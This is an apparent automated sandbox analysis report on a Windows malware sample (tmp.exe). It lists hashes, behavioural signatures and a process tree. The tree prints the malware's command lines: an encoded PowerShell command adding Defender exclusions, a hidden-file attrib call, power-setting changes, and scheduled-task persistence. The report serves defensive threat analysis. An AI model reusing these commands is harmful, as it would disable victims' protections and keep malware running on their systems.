Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
05-03-2024 21:43
Static task
static1
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
tmp.exe
Resource
win10v2004-20240226-en
General
-
Target
tmp.exe
-
Size
2.9MB
-
MD5
8340b7602e82921aa8d72ae4f8ea11cc
-
SHA1
a49524d26639130bc09acb4a0187917fbc5ec003
-
SHA256
efee38133480e7ccaa11424d49bb3d8ebdb89ffb1d81a10f6c405337e7d3a737
-
SHA512
eab92e881f24d6fdcb061540c3ee96f4d4fa9e26a7ef1ea82743ebca3e64821f94467cc65a2c3e83ee4c9091cc4e714e938b9f583c3dc9f88938555322e04f10
-
SSDEEP
49152:qy540hQLZ04Zv0lP/x3CTa5i1UXMYKGQylk7lQkqfxcTSI9PVVb99JjGn:qy5406+4UP/xCTa+YKGQyWlQBZcTSIpm
Malware Config
Signatures
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation tmp.exe -
Executes dropped EXE 4 IoCs
pid Process 2512 7z.exe 2324 7z.exe 4584 7z.exe 2764 Installer.exe -
Loads dropped DLL 3 IoCs
pid Process 2512 7z.exe 2324 7z.exe 4584 7z.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 111 pastebin.com 112 pastebin.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2764 set thread context of 1296 2764 Installer.exe 109 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3252 schtasks.exe 3760 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 1296 RegSvcs.exe 1296 RegSvcs.exe 4236 powershell.exe 4236 powershell.exe 4236 powershell.exe 1296 RegSvcs.exe 1296 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 26 IoCs
description pid Process Token: SeRestorePrivilege 2512 7z.exe Token: 35 2512 7z.exe Token: SeSecurityPrivilege 2512 7z.exe Token: SeSecurityPrivilege 2512 7z.exe Token: SeRestorePrivilege 2324 7z.exe Token: 35 2324 7z.exe Token: SeSecurityPrivilege 2324 7z.exe Token: SeSecurityPrivilege 2324 7z.exe Token: SeRestorePrivilege 4584 7z.exe Token: 35 4584 7z.exe Token: SeSecurityPrivilege 4584 7z.exe Token: SeSecurityPrivilege 4584 7z.exe Token: SeDebugPrivilege 1296 RegSvcs.exe Token: SeDebugPrivilege 4236 powershell.exe Token: SeShutdownPrivilege 5016 powercfg.exe Token: SeCreatePagefilePrivilege 5016 powercfg.exe Token: SeShutdownPrivilege 1816 powercfg.exe Token: SeCreatePagefilePrivilege 1816 powercfg.exe Token: SeShutdownPrivilege 1480 powercfg.exe Token: SeCreatePagefilePrivilege 1480 powercfg.exe Token: SeShutdownPrivilege 3340 powercfg.exe Token: SeCreatePagefilePrivilege 3340 powercfg.exe Token: SeShutdownPrivilege 4340 powercfg.exe Token: SeCreatePagefilePrivilege 4340 powercfg.exe Token: SeShutdownPrivilege 4340 powercfg.exe Token: SeCreatePagefilePrivilege 4340 powercfg.exe -
Suspicious use of WriteProcessMemory 53 IoCs
description pid Process procid_target PID 3068 wrote to memory of 4472 3068 tmp.exe 91 PID 3068 wrote to memory of 4472 3068 tmp.exe 91 PID 4472 wrote to memory of 4632 4472 cmd.exe 93 PID 4472 wrote to memory of 4632 4472 cmd.exe 93 PID 4472 wrote to memory of 2512 4472 cmd.exe 94 PID 4472 wrote to memory of 2512 4472 cmd.exe 94 PID 4472 wrote to memory of 2324 4472 cmd.exe 95 PID 4472 wrote to memory of 2324 4472 cmd.exe 95 PID 4472 wrote to memory of 4584 4472 cmd.exe 96 PID 4472 wrote to memory of 4584 4472 cmd.exe 96 PID 4472 wrote to memory of 4528 4472 cmd.exe 97 PID 4472 wrote to memory of 4528 4472 cmd.exe 97 PID 4472 wrote to memory of 2764 4472 cmd.exe 98 PID 4472 wrote to memory of 2764 4472 cmd.exe 98 PID 4472 wrote to memory of 2764 4472 cmd.exe 98 PID 2764 wrote to memory of 1296 2764 Installer.exe 109 PID 2764 wrote to memory of 1296 2764 Installer.exe 109 PID 2764 wrote to memory of 1296 2764 Installer.exe 109 PID 2764 wrote to memory of 1296 2764 Installer.exe 109 PID 2764 wrote to memory of 1296 2764 Installer.exe 109 PID 1296 wrote to memory of 1560 1296 RegSvcs.exe 110 PID 1296 wrote to memory of 1560 1296 RegSvcs.exe 110 PID 1296 wrote to memory of 1560 1296 RegSvcs.exe 110 PID 1560 wrote to memory of 4236 1560 cmd.exe 112 PID 1560 wrote to memory of 4236 1560 cmd.exe 112 PID 1560 wrote to memory of 4236 1560 cmd.exe 112 PID 1560 wrote to memory of 5016 1560 cmd.exe 113 PID 1560 wrote to memory of 5016 1560 cmd.exe 113 PID 1560 wrote to memory of 5016 1560 cmd.exe 113 PID 1560 wrote to memory of 1816 1560 cmd.exe 114 PID 1560 wrote to memory of 1816 1560 cmd.exe 114 PID 1560 wrote to memory of 1816 1560 cmd.exe 114 PID 1560 wrote to memory of 1480 1560 cmd.exe 115 PID 1560 wrote to memory of 1480 1560 cmd.exe 115 PID 1560 wrote to memory of 1480 1560 cmd.exe 115 PID 1560 wrote to memory of 3340 1560 cmd.exe 116 PID 1560 wrote to memory of 3340 1560 cmd.exe 116 PID 1560 wrote to memory of 3340 1560 cmd.exe 116 PID 1560 wrote to memory of 4340 1560 cmd.exe 117 PID 1560 wrote to memory of 4340 1560 cmd.exe 117 PID 1560 wrote to memory of 4340 1560 cmd.exe 117 PID 1296 wrote to memory of 3528 1296 RegSvcs.exe 118 PID 1296 wrote to memory of 3528 1296 RegSvcs.exe 118 PID 1296 wrote to memory of 3528 1296 RegSvcs.exe 118 PID 1296 wrote to memory of 4228 1296 RegSvcs.exe 119 PID 1296 wrote to memory of 4228 1296 RegSvcs.exe 119 PID 1296 wrote to memory of 4228 1296 RegSvcs.exe 119 PID 3528 wrote to memory of 3252 3528 cmd.exe 122 PID 3528 wrote to memory of 3252 3528 cmd.exe 122 PID 3528 wrote to memory of 3252 3528 cmd.exe 122 PID 4228 wrote to memory of 3760 4228 cmd.exe 123 PID 4228 wrote to memory of 3760 4228 cmd.exe 123 PID 4228 wrote to memory of 3760 4228 cmd.exe 123 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4528 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"2⤵
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Windows\system32\mode.commode 65,103⤵PID:4632
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p146312891125116171371883110193 -oextracted3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2324
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4584
-
-
C:\Windows\system32\attrib.exeattrib +H "Installer.exe"3⤵
- Views/modifies file attributes
PID:4528
-
-
C:\Users\Admin\AppData\Local\Temp\main\Installer.exe"Installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAGgASgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAE0AYgBtAEUAVgBHAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANwAyAEcAYgBXADUAVABkAFIAcAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAEgAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off5⤵
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGgASgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAE0AYgBtAEUAVgBHAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANwAyAEcAYgBXADUAVABkAFIAcAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAEgAIwA+AA=="6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4236
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
PID:5016
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
PID:1480
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /hibernate off6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4340
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:3528 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
- Creates scheduled task(s)
PID:3252
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3819" /TR "C:\ProgramData\Dllhost\dllhost.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3819" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
- Creates scheduled task(s)
PID:3760
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.6MB
MD572491c7b87a7c2dd350b727444f13bb4
SHA11e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA25634ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
Filesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
Filesize
610KB
MD56141fcd89a442521fabada983b07696a
SHA1c884d75aa3df2ab52ad128146e45825466db257e
SHA2565a4414a62987d89c24f62ba447cb25b3310a4e543dcb505a807e62a77d8d1426
SHA5125f482678d7c71127d67f9b52d3e4c4e99111a4a2bbcbf36e299f57c6fffb354a490d573ee565b99483ac9b3ff015fc9337dffdb5d739a94d1994662a5dde0107
-
Filesize
2.2MB
MD5b5e813efd092c823e641722e0e721cf2
SHA1e381b6fc4a362091a4b09e6e366d15efdb6820d3
SHA256fe75fd8c297d1d223ba238caa95e2d3bd9436538d125c8b87f62a297aeb11b42
SHA512be677d3811cd2a3f6b187ac53e7086307776abc9fef39165c4b0a54aceaa332a88da84e4ce4234a653c12a2a57dabd77ddf74b40ae9e709436b8ac6ef7d96283
-
Filesize
499KB
MD5ca8acb796044d922702f2fedd039c718
SHA145b997cc60b4875eec3f462006f1605dcb16c984
SHA256710634857b5c70a6b6f014da45b0e1705a180aca3f2c1d53c39aa179d2451671
SHA512591c1da7c720500440aa47bc52423457d0963eca381451a6163a144c0168ed863b45872020a2a6fa645b97db397e93060265f7c150616a039c2aed25cd0607da
-
Filesize
2.1MB
MD57f93db1b1ba5dd798ee0fb7ac1ee5b5a
SHA1b68db4bdb7ad77c720a1861ec9158b49b99c3473
SHA25650806e50951c2ab080a1ad10873349940355d49cbecf564bdc4d3ca65516dff2
SHA51241e7df8738ef3f549d20c3943d0a4b2aa34e91675604d0bec62fa6633d7fb262a38adcde70b8c08639cbf9d62cf043b4220b8fc20483f061687815da22faef5a
-
Filesize
2.1MB
MD5fc7c63ffa72326c3641efbdf507ab046
SHA1a65964ee890eabc1e09d16ad4a36fa0530290435
SHA2563bac3a7196c4e1f347bbfc4bb7319c14a60155edadb246cc41f3a251b76f3bf6
SHA51239168751411ceff6b44013bb3eb2ca4a59c6b11f119d3fac72fcf85d401113170dd056d8dcdce29f0f60b38feedc0cb4bc72461ed32c17d6a616c446eacd62e8
-
Filesize
476B
MD54edd28bf306d37273a4b30ef3f75d92f
SHA1db8fbd39931f0faaa160c700435279210bf97cc3
SHA256e49d849e2a89613a493a07ee4f15f56cde89073e1dc527a4881846dd03eaa130
SHA512b05fb8ff44ce032d09f096de855d99d64f64c03dead392863aa186edd05809fc99825862432dc7b826447b5880fe7b1eeb6135502df35d0227c16691665530df